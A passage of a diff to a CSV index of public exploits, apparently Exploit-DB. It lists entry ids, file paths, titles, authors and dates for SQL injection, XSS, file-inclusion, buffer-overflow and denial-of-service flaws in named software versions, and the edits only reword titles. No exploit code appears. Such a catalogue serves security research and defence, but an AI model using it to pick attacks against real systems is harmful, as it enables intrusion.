Reboot",2014-01-04,nicx0,hardware,dos,0 -30689,platforms/php/webapps/30689.php,"Taboada Macronews <= 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0 +30689,platforms/php/webapps/30689.php,"Taboada Macronews 1.0 - SQLi Exploit",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0 31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 @@ -27643,17 +27643,17 @@ id,file,description,date,author,platform,type,port 30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 Filename.ASP Cross-Site Scripting",2007-10-20,"Aria-Security Team",asp,webapps,0 -30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 Index.php Local File Include",2007-10-20,sekuru,php,webapps,0 +30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 Index.php Local File Inclusion",2007-10-20,sekuru,php,webapps,0 30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,php,webapps,0 30699,platforms/php/webapps/30699.txt,"Hackish 1.1 Blocco.php Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0 30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 Index.php SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 -30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 Download.php Local File Include",2007-10-22,hack2prison,php,webapps,0 +30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 Download.php Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 -30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.php Remote File Include",2007-10-24,Alucar,php,webapps,0 +30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.php Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 30711,platforms/linux/remote/30711.txt,"Shttp 0.0.x - Remote Directory Traversal",2007-10-25,"Pete Foster",linux,remote,0 30712,platforms/php/webapps/30712.txt,"Multi-Forums Directory.php Multiple SQL Injection Vulnerabilities",2007-10-25,KiNgOfThEwOrLd,php,webapps,0 @@ -27676,20 +27676,20 @@ id,file,description,date,author,platform,type,port 30728,platforms/linux/remote/30728.txt,"Yarssr 0.2.2 GUI.PM Remote Code Injection",2007-10-31,"Duncan Gilmore",linux,remote,0 30729,platforms/multiple/remote/30729.txt,"Blue Coat ProxySG Management Console URI Handler Multiple Cross-Site Scripting Vulnerabilities",2007-10-29,"Adrian Pastor",multiple,remote,0 30730,platforms/windows/remote/30730.txt,"SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion",2007-11-01,"Will Dormann",windows,remote,0 -30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.php Local File Include",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 +30731,platforms/php/webapps/30731.txt,"Synergiser 1.2 Index.php Local File Inclusion",2007-11-01,KiNgOfThEwOrLd,php,webapps,0 30732,platforms/php/webapps/30732.txt,"CONTENTCustomizer 3.1 Dialog.php Information Disclosure",2007-11-01,d3hydr8,php,webapps,0 -30733,platforms/php/webapps/30733.txt,"phpMyAdmin <= 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 +30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 -30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.php Local File Include",2007-11-03,joseph.giron13,php,webapps,0 +30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 Index.php Local File Inclusion",2007-11-03,joseph.giron13,php,webapps,0 30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution",2007-11-02,"Drake Wilson",linux,remote,0 -30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - Upload_Config.php Remote File Include",2007-11-05,"arfis project",php,webapps,0 +30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0 30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 Articles.php SQL Injection",2007-11-05,r00t,php,webapps,0 30739,platforms/php/webapps/30739.txt,"JLMForo System Buscado.php Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0 30740,platforms/hardware/remote/30740.html,"BT Home Hub 6.2.2.6 Login Procedure Authentication Bypass",2007-11-05,"David Smith",hardware,remote,0 -30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.php Local File Include",2007-11-05,"BorN To K!LL",php,webapps,0 +30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 Index.php Local File Inclusion",2007-11-05,"BorN To K!LL",php,webapps,0 30742,platforms/multiple/remote/30742.txt,"OpenBase 10.0.x - (Buffer Overflow & Remote Command Execution) Multiple Vulnerabilities",2007-11-05,"Kevin Finisterre",multiple,remote,0 30743,platforms/asp/webapps/30743.txt,"i-Gallery 3.4 igallery.ASP Remote Information Disclosure",2007-11-05,hackerbinhphuoc,asp,webapps,0 -30744,platforms/linux/dos/30744.txt,"MySQL <= 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service",2007-11-05,"Joe Gallo",linux,dos,0 +30744,platforms/linux/dos/30744.txt,"MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service",2007-11-05,"Joe Gallo",linux,dos,0 30745,platforms/php/webapps/30745.html,"Weblord.it MS-TopSites Unauthorized Access and HTML Injection",2007-11-06,0x90,php,webapps,0 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0 30747,platforms/asp/webapps/30747.txt,"Rapid Classified AgencyCatResult.ASP SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0 @@ -27711,7 +27711,7 @@ id,file,description,date,author,platform,type,port 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 -30766,platforms/linux/dos/30766.c,"GNU TAR <= 1.15.91 and CPIO <= 2.5.90 safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 +30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 and CPIO 2.5.90 safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 30768,platforms/multiple/remote/30768.txt,"IBM WebSphere Application Server 5.1.1 WebContainer HTTP Request Header Security Weakness",2007-11-15,anonymous,multiple,remote,0 30769,platforms/php/webapps/30769.txt,"Nuked-Klan 1.7.5 File Parameter News Module Cross-Site Scripting",2007-11-15,Bl@ckM@mba,php,webapps,0 @@ -27731,7 +27731,7 @@ id,file,description,date,author,platform,type,port 30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service",2008-01-02,greyvoip,multiple,dos,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities",2008-01-03,The:Paradox,php,webapps,0 -30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 +30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,80 30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload",2014-01-07,Metasploit,php,remote,80 30788,platforms/windows/local/30788.rb,"IcoFX - Stack Buffer Overflow",2014-01-07,Metasploit,windows,local,0 @@ -27761,7 +27761,7 @@ id,file,description,date,author,platform,type,port 30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service",2007-11-29,"Elazar Broad",windows,dos,0 30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.php3 - Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.php3 - Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 -30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 +30835,platforms/unix/remote/30835.sh,"Apache HTTP Server 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.php SQL Injection",2007-11-30,Lostmon,php,webapps,0 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service",2007-11-30,TeLeMan,linux,dos,0 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering",2007-12-01,"Carl Hardwick",multiple,remote,0 @@ -27794,10 +27794,10 @@ id,file,description,date,author,platform,type,port 30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 register.php Cross-Site Scripting",2007-11-12,"Omer Singer",php,webapps,0 30885,platforms/multiple/dos/30885.txt,"QK SMTP Server Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0 30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection",2007-12-13,"Sw33t h4cK3r",php,webapps,0 -30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Include",2007-12-15,"Michael Brooks",php,webapps,0 +30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Inclusion",2007-12-15,"Michael Brooks",php,webapps,0 30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 - /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0 30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 - Unauthorized Post Access",2007-12-15,"Michael Brooks",php,webapps,0 -30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 +30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0 30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0 @@ -27823,17 +27823,17 @@ id,file,description,date,author,platform,type,port 30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution",2014-01-14,Metasploit,hardware,remote,32764 30916,platforms/php/webapps/30916.txt,"Burden 1.8 - Authentication Bypass",2014-01-14,"High-Tech Bridge SA",php,webapps,80 30917,platforms/php/webapps/30917.txt,"Horizon QCMS 4.0 - Multiple Vulnerabilities",2014-01-14,"High-Tech Bridge SA",php,webapps,80 -30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Include",2007-12-20,JuMp-Er,php,webapps,0 +30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Inclusion",2007-12-20,JuMp-Er,php,webapps,0 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0 30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack-Based Buffer Overflow",2007-12-21,"Luigi Auriemma",multiple,dos,0 30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos,0 -30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.php ID Remote File Include",2007-12-22,"Beenu Arora",php,webapps,0 +30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.php ID Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x forum/viewthread.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x forum/viewforum.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 30926,platforms/php/webapps/30926.txt,"Dokeos 1.x work/work.php display_upload_form Action origin Parameter XSS",2007-12-22,Doz,php,webapps,0 -30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Include",2007-12-24,Koller,php,webapps,0 +30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion",2007-12-24,Koller,php,webapps,0 30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 30929,platforms/php/webapps/30929.txt,"Logaholic update.php page Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 30930,platforms/php/webapps/30930.txt,"Logaholic index.php parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 @@ -27866,22 +27866,22 @@ id,file,description,date,author,platform,type,port 30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 - search.php string Parameter XSS",2007-12-29,Lostmon,php,webapps,0 30959,platforms/php/webapps/30959.txt,"Makale Scripti Cross-Site Scripting",2007-12-29,GeFORC3,php,webapps,0 30960,platforms/php/webapps/30960.pl,"CustomCMS 3.1 - 'vars.php' SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0 -30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Include",2007-12-30,bd0rk,php,webapps,0 +30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0 30962,platforms/php/webapps/30962.txt,"MilliScripts 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0 30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site Login SQL Injection",2007-12-31,"Aria-Security Team",asp,webapps,0 30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 user/remindPassword return Parameter XSS",2007-12-31,Doz,php,webapps,0 30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 category q Parameter XSS",2007-12-31,Doz,php,webapps,0 30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 order return Parameter XSS",2007-12-31,Doz,php,webapps,0 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0 -30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 - wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 +30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 Index.php Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' Parameter SQL Injection Weakness",2008-01-03,MustLive,php,webapps,0 30983,platforms/php/webapps/30983.txt,"ExpressionEngine 1.2.1 HTTP Response Splitting and Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30984,platforms/php/webapps/30984.txt,"eTicket 1.5.5 - 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",php,webapps,0 30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0 -31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Include",2008-01-31,muuratsalo,php,webapps,0 -30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 - 'index.php' Remote File Include",2008-01-04,S.W.A.T.,php,webapps,0 +31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Inclusion",2008-01-31,muuratsalo,php,webapps,0 +30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 - 'index.php' Remote File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial Of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 @@ -27894,9 +27894,9 @@ id,file,description,date,author,platform,type,port 30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 30998,platforms/linux/remote/30998.py,"SynCE 0.92 - 'vdccm' Daemon Remote Command Injection",2008-01-07,"Alfredo Ortega",linux,remote,0 30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta ",windows,local,0 -31000,platforms/php/webapps/31000.txt,"SysHotel On Line System 'index.php' Local File Include",2008-01-08,p4imi0,php,webapps,0 +31000,platforms/php/webapps/31000.txt,"SysHotel On Line System 'index.php' Local File Inclusion",2008-01-08,p4imi0,php,webapps,0 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - 'admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps,0 -31002,platforms/linux/dos/31002.txt,"xine-lib <= 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos,0 +31002,platforms/linux/dos/31002.txt,"xine-lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos,0 31003,platforms/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass and User Enumeration Weakness",2008-01-09,MC.Iglo,php,webapps,0 31004,platforms/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/login.jsp Multiple Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - /idm/account/findForSelect.jsp resultsForm Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 @@ -27905,21 +27905,21 @@ id,file,description,date,author,platform,type,port 31008,platforms/php/webapps/31008.txt,"Joomla-SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps,0 31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 -31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Include",2008-01-11,ShipNX,php,webapps,0 +31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,php,webapps,0 31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross-Site Scripting",2008-01-31,"Tomasz Kuczynski",php,webapps,0 31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery",2008-01-15,hkm,hardware,remote,0 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80 -31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <= 11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 +31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard 11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0 -31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 - 'install.php' Cross-Site Scripting",2008-01-12,"Hanno Bock",php,webapps,0 -31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service",2008-01-12,"David Barroso",osx,dos,0 +31020,platforms/php/webapps/31020.txt,"Moodle 1.8.3 - 'install.php' Cross-Site Scripting",2008-01-12,"Hanno Bock",php,webapps,0 +31021,platforms/osx/dos/31021.html,"Apple Safari 2.0.4 KHTML WebKit Remote Denial of Service",2008-01-12,"David Barroso",osx,dos,0 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",php,webapps,0 31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow",2008-01-11,anonymous,windows,remote,0 31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass",2008-01-16,nnposter,hardware,remote,0 31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote,0 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80 -31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 - 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0 +31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 @@ -27930,15 +27930,15 @@ id,file,description,date,author,platform,type,port 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps,0 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps,0 31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting",2008-01-21,trew,php,webapps,0 -31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Parameter Remote File Include",2008-01-21,anonymous,php,webapps,0 +31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Parameter Remote File Inclusion",2008-01-21,anonymous,php,webapps,0 31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Buffer Overflow",2008-01-09,Knell,windows,remote,0 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0 31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-01-22,RawSecurity.org,php,webapps,0 31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting",2008-01-22,NBBN,php,webapps,0 -31050,platforms/multiple/remote/31050.php,"Firebird <= 2.0.3 Relational Database 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0 +31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 -31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 -31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 +31052,platforms/linux/remote/31052.java,"Apache 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 +31053,platforms/php/remote/31053.php,"PHP 5.2.5 cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos,0 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure",2008-01-23,"AmnPardaz ",asp,webapps,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File 